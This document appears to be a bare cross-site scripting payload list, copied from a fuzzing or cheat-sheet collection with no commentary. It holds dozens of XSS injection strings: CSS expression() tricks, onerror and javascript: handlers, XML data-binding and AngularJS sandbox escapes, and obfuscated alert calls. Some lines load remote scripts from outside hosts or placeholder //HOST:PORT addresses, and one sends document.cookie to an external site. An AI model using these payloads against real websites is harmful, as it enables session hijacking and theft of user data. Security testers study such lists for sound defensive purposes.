!#$%&’*+-/=?^@xss.cx”>_`{}|~@xss.cx
xss:expression(alert(/Xss/)
xss:expression(alert(/Xss-By-Muhaddi/)
{}*{xss:expression(open(alert(1)))}
xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>
<! XSS=”><img src=xx:x onerror=alert(1)//”>
<! XSS=”><img src=xx:x onerror=confirm(1)//”>
[XSS](javascript:confirm(6))
<xss><script>alert(‘WXSS’)</script></vulnerable>
xss →<! — <script>xss
<XSS STYLE=”behavior: url(%(htc)s);”>
<;XSS STYLE=”;behavior: url(http://ha.ckers.org/xss.htc);";>;
<XSS STYLE=”behavior: url(http://ha.ckers.org/xss.htc);">
<XSS STYLE=”behavior: url(xss.htc);”>
<~/XSS STYLE=xss:expression(alert(‘XSS’))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
<;XSS STYLE=”;xss:expression(alert(‘;XSS’;))”;>;
</XSS STYLE=xss:expression(alert(‘XSS’))>
</XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
<XSS STYLE=”xss:expression(alert(‘XSS’))”>
<XSS STYLE=xss:e/**/xpression(alert(‘XSS’))>
<XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
XSS STYLE=xss:e/**/xpression(alert(‘XSS’))>
XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
<XSS STYLE=”xss:expression(document.vulnerable=true)”>
<XSS STYLE=”xss:expression(javascript:alert(1))”>
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=”http://www.procheckup.com/?sid="%2bdocument.cookie)>
<xss:xss>XSS</xss:xss>
<xss:xss>XSS</xss:xss></HTML>”””,”XML namespace.”),(“””<XML ID=”xss”><I><B>&lt;IMG SRC=”javas<! — →cript:javascript:alert(1)”&gt;</B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
<x style=”background:url(‘x&#1;;color:red;/*’)”>XXX</x>
<x style=”background:url(‘x[a];color:red;/*’)”>XXX</x>
<x style=”background:url(‘x ;color:red;/*’)”>XXX</x>
<x style=”behavior:url(%(sct)s)”>
<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>
x=this[x]
x</title><img src%3dx onerror%3dalert(1)>
x��</title><img src%3dx onerror%3dalert(1)>
x=’\x61\x6c\x65\x72\x74\x28\x31\x29';new Function(x)()
x=x=>{}/alert(1)/+alert(2)
<x xmlns=”http://www.w3.org/2001/xml-events" event=”load” observer=”foo” handler=”data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar”/>
<x xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:actuate=”onLoad” xlink:href=”javascript:alert(1)” xlink:type=”simple”/>
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
(X=_=>`(X=${X})()`)()
XXX<style>*[‘<! — ‘]{}</style> →{}*{color:red}</style>
x=x=>x=>x=>x=>x=>x=>x=>alert(1);x()()()()()()()()
x(x(y))
x(y)
{{x = {‘y’:’’.constructor.prototype}; x[‘y’].charAt=[].join;$eval(‘x=alert(1)’);}}
xyz onerror=alert(6);
y=<a>alert</a>;content[y](123)
y=’nam’+$$
y=’na’+’me’
y=name
y=x(y)
‘“()=<z>
z=d.createElement(“script”);
z=d.createElement(“script”);z.src=”//HOST:PORT”;
ZeroClipboard.swf?id=\”))} catch(e) {alert(1);}//&width=1000&height=1000
z.src=”//HOST:PORT”;